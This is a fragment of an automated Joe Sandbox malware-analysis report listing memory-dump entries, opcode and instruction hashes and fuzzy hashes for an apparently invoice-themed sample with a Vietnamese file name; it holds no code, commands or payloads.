                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 229451fa2bee54102691543deef0b2da7a42010a17dec9285f871b8d834577b0
                                                                                                                                                                                                                                                                  • Instruction ID: 4f68c15abef8d8621a0d0a91abe4976c2d6c46d31f870dfacc46c90b6e8d5703
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 229451fa2bee54102691543deef0b2da7a42010a17dec9285f871b8d834577b0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9E0B675A0011D8FCB10DBA8E44079DB7B1FB94311F0081A6D60CF7204DB305AA58F50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9ec01a03bf38cb8bbcbd9c1b4a533f492410df651283dc98af465c10b4dc8aab
                                                                                                                                                                                                                                                                  • Instruction ID: 055c889a42116dfe3ef356c95dacffea675343bb004a599daae20ced7be91cf2
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec01a03bf38cb8bbcbd9c1b4a533f492410df651283dc98af465c10b4dc8aab
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8D017B080510DABCF08EFA4E81B4BDBF34AA54301F4081A9D907926A0EF341A6ACF81
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 9e6086686826d3ae45852c3f518ae080cca6c183f35c7e39a5670424ba971a4f
                                                                                                                                                                                                                                                                  • Instruction ID: bf86dfaf583c90e7abfae27ea67a4bcc39b7476c85358f4e32a78cd1035eed85
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9e6086686826d3ae45852c3f518ae080cca6c183f35c7e39a5670424ba971a4f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67D0122518D7406FC78247506910BCA7F709F7B741F252083E148CE161D6250D90D762
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: fa2168504f769d729d620eff980411546cab9fa606149ef85c28c2f552368be2
                                                                                                                                                                                                                                                                  • Instruction ID: 3905e8ef980e9fdf141965e2a0916b9a28b61600f4faf7317a98a6d8e1859c90
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa2168504f769d729d620eff980411546cab9fa606149ef85c28c2f552368be2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F1D012F64093806FD7078B281C59A996F21DBF3386F4A508BF095CB1B3D77C8426A755
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d8ea60afaf943eb901434d2d17c4ae62460271ef3879fe49fe795b7fab3e8c8b
                                                                                                                                                                                                                                                                  • Instruction ID: ca7d290b9b08b65d35d7180f96ea13ac64e5c45bf0d354812eee641de2f75b3b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8ea60afaf943eb901434d2d17c4ae62460271ef3879fe49fe795b7fab3e8c8b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BDD012B0044280DBD700EB14F48A7887B58A791308F54C11981044F6A6C7BA65A64BC3
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 7c95b8520194081a902c8b900f54571a6545a20b07d0d1fde21969a2384b3188
                                                                                                                                                                                                                                                                  • Instruction ID: 136d01b3a8e2c7d9c5d1aa85117e160a4fbc95c220d09a59d46836412e3fc021
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7c95b8520194081a902c8b900f54571a6545a20b07d0d1fde21969a2384b3188
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67C012A165F3D04FCA03833068268F9AF202AA3964309428BD089CE2D3D7288668C792
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c7e463aac046366850d0769223a3457b4251cb4251e68bd00636103882e1b781
                                                                                                                                                                                                                                                                  • Instruction ID: ef95d1b97bc2c9f2ddaeb0b3ff57dec26d31ba6d78a2b025ee69e19a9c5750de
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7e463aac046366850d0769223a3457b4251cb4251e68bd00636103882e1b781
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F9B0127050500CDBCA04CA91E4064BD7730E781209F004189D90B41550CF210C3186C1
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 185ce9b7e33c7355087632795700c8c532d228938169694284bf8969382d26f4
                                                                                                                                                                                                                                                                  • Instruction ID: 899e2b8f993072feb16abb4f23e2bdda6049c74d63bd4ce7ee347f11ea3c10d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 185ce9b7e33c7355087632795700c8c532d228938169694284bf8969382d26f4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48A01130008000CFC200AB20E8380B23BAEEBAE28A380A000C02B8A0828A280C00CB20
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: UUUU
                                                                                                                                                                                                                                                                  • API String ID: 0-1798160573
                                                                                                                                                                                                                                                                  • Opcode ID: dc76ffca50a77fc41eace98f9f9679d5415b2717583004eeced5089643df749a
                                                                                                                                                                                                                                                                  • Instruction ID: 30086736ef7e2af7a10d5cc9a78ae8bb22dc5aa265623caef83ee285c0adbcfb
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc76ffca50a77fc41eace98f9f9679d5415b2717583004eeced5089643df749a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EC12C2B1E006598BDB14CFAAC98069DFBF6BF89304F28C169D458EB219D734A946CF50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: K
                                                                                                                                                                                                                                                                  • API String ID: 0-856455061
                                                                                                                                                                                                                                                                  • Opcode ID: d1057b76a8bb8bdf6349f8cbc3c6d2270cca58ebff3a5784c2e1d9224df40457
                                                                                                                                                                                                                                                                  • Instruction ID: aff9020d78a9d9d274a2f47853fbf43d9986f05775640987b62df136ab5de15e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1057b76a8bb8bdf6349f8cbc3c6d2270cca58ebff3a5784c2e1d9224df40457
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7831D6B1D01619CBDB18CF6BC8446AAFAFBBFC9300F14C1BA9618A7254DB744A81CF55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a83dcd849d8afce77d77c5eb54462e78b6a59c4d94fd558954cb0d948bf249cf
                                                                                                                                                                                                                                                                  • Instruction ID: 3306afe508202d51792889ee70dd89a9eca1a115c47431e0acdfbf7c3d25f351
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a83dcd849d8afce77d77c5eb54462e78b6a59c4d94fd558954cb0d948bf249cf
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 691294F1411F468AE730CFA5ED981893BA1B745328F944308D2A56BAF1DBFC116ACF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bb2fb6d5a652a424f893d1959e8df3014a1fcae15fb72cfa4e060b7d9b0d55ff
                                                                                                                                                                                                                                                                  • Instruction ID: 126e77eca06b21579c2b406dd2a2cee3ddb03b7834519442c8ec82fd748f147c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb2fb6d5a652a424f893d1959e8df3014a1fcae15fb72cfa4e060b7d9b0d55ff
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84A17E32E002198FCF15DFA5C8449DEBBF2FF85300B1585AAE905BB261EB75AA45DB40
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e50f7af56fb07287f6e36256eb0ee38920d2b155fb0d1369fc0cd4a5c32af604
                                                                                                                                                                                                                                                                  • Instruction ID: d39e60f1eb445ca6c487ab9acb61033c5c97809d567614b60420d45d6f84dbfd
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e50f7af56fb07287f6e36256eb0ee38920d2b155fb0d1369fc0cd4a5c32af604
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5C1F7B1811B468AD720DFA5EC981897BB1FB85328F544318D2A16B6F0DFFC14A6CF94
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4908fada472093c069810e0d6050ca86bf35f37eff62b031db47a1e8b412464d
                                                                                                                                                                                                                                                                  • Instruction ID: 21556758e002b29a4127815bc85b98b34cfdcf0184b0ccc0474a2e2ee75c91ab
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4908fada472093c069810e0d6050ca86bf35f37eff62b031db47a1e8b412464d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A88109B0A45219CFEB20CF29C844BB9BBF9FB8A344F26D4A9C009A7255DB744D85CF11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: e11b9bcbc12a624a84118714b177b4b2c73ce998dc45f04b781c52ba2a51f46e
                                                                                                                                                                                                                                                                  • Instruction ID: 23c793c88c93e6bb90f2ce4aeb4b5ab5ef1c450ec286708cde836ce449dd70c1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e11b9bcbc12a624a84118714b177b4b2c73ce998dc45f04b781c52ba2a51f46e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5149B4A052198FDB04DFA9D8809ADBBF6FF8D340F248169E409EB345D735AA42CB50
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a0bcc79dbb27fa522d70cd3c7af624c60eb21d7444240c05cc96d11b69d93e44
                                                                                                                                                                                                                                                                  • Instruction ID: 066d0a733e67429b95751791a91c1818d2ce5b8ade5c1dd99b98ec0a1c7dbd67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0bcc79dbb27fa522d70cd3c7af624c60eb21d7444240c05cc96d11b69d93e44
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 464166B5E016198BDB18CFABD94059EFBF3BFC8300F18C16AD958AB214EB3459458F54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c8e012cb7fe8aeb36e7efa36cb7d34cb79669385cd1a38bfd62cdfbe3ed9a6a8
                                                                                                                                                                                                                                                                  • Instruction ID: 93b06598441d9510cb7983b1e85143c5efe8c87551450741111226b51751ee0e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c8e012cb7fe8aeb36e7efa36cb7d34cb79669385cd1a38bfd62cdfbe3ed9a6a8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA11CEB1E016199BDB1CCF5BD9402DEFAF7BFC9300F14C0BA9A18B6214DB740A828E54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$A$I$V$X
                                                                                                                                                                                                                                                                  • API String ID: 0-2237477532
                                                                                                                                                                                                                                                                  • Opcode ID: cc4f25c6bf975ea33afc8c57311b84810d17d53fad4c8a63348fb29c5a03250c
                                                                                                                                                                                                                                                                  • Instruction ID: 20950518a9952f006cb70f8de0154bd6e304d9a537d75acab54b4b20fda45e36
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cc4f25c6bf975ea33afc8c57311b84810d17d53fad4c8a63348fb29c5a03250c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9711F9B0D15209CFDB24CFA9C1487ADBBFCEB4A358F149159E019AB291C3788985CF45
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: -$/$>$I
                                                                                                                                                                                                                                                                  • API String ID: 0-333942966
                                                                                                                                                                                                                                                                  • Opcode ID: ce00a61a22b9161ef04a1d092c40064b9c400cb1f514bdec2caf7ab2b2516236
                                                                                                                                                                                                                                                                  • Instruction ID: 7af29210bdcd9abd47696dc623790e57cdf3215cb0c8a0c7c4090f69eb385e98
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce00a61a22b9161ef04a1d092c40064b9c400cb1f514bdec2caf7ab2b2516236
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A121FEB4D092198FDB65DF29C5487A9BBF9EB4A344F4080EAE418AB245D7789E80CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$A$I$X
                                                                                                                                                                                                                                                                  • API String ID: 0-1490911726
                                                                                                                                                                                                                                                                  • Opcode ID: d9c23a1eff346896154306c00a924e27a3b8509ba3e68cfc91d91eb423c87e86
                                                                                                                                                                                                                                                                  • Instruction ID: eb23bec9ac19827a315f7aa68c4960fac13f7d329f70c9bf4930613770a3ebba
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d9c23a1eff346896154306c00a924e27a3b8509ba3e68cfc91d91eb423c87e86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C20117B0C0A249CFCB24CB58D1587ACBBFCEB0A354F18909AD004AB291C3B88986CF00
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: '$>$I$]
                                                                                                                                                                                                                                                                  • API String ID: 0-2708724578
                                                                                                                                                                                                                                                                  • Opcode ID: 3c229489f7fb3a2e323c04dbb4c0ce90d7f6aa6f348814955ede4578a9b5da68
                                                                                                                                                                                                                                                                  • Instruction ID: efb48225858e317a87462a9ba983a4de2f0c8f0222fd89727f94bd72f68ee03c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c229489f7fb3a2e323c04dbb4c0ce90d7f6aa6f348814955ede4578a9b5da68
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 410129B0C05309CFDB24CF58C548BACB7BCFB0A354F049596E018AB290C3788985CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 6$>$I$c
                                                                                                                                                                                                                                                                  • API String ID: 0-2713407923
                                                                                                                                                                                                                                                                  • Opcode ID: 42664fcf7201b8e161dce0be38cfe5bfbaf7c9fe8152df43da7342415ab42916
                                                                                                                                                                                                                                                                  • Instruction ID: 4119c69856e67fa2c19ff9888481c89183e78a9865a1ae10e8162b1f592cd8f0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 42664fcf7201b8e161dce0be38cfe5bfbaf7c9fe8152df43da7342415ab42916
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC0108B4D05209CFDB24CF59D1887AD77FDEB4A358F149095E019AB250C7788985CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
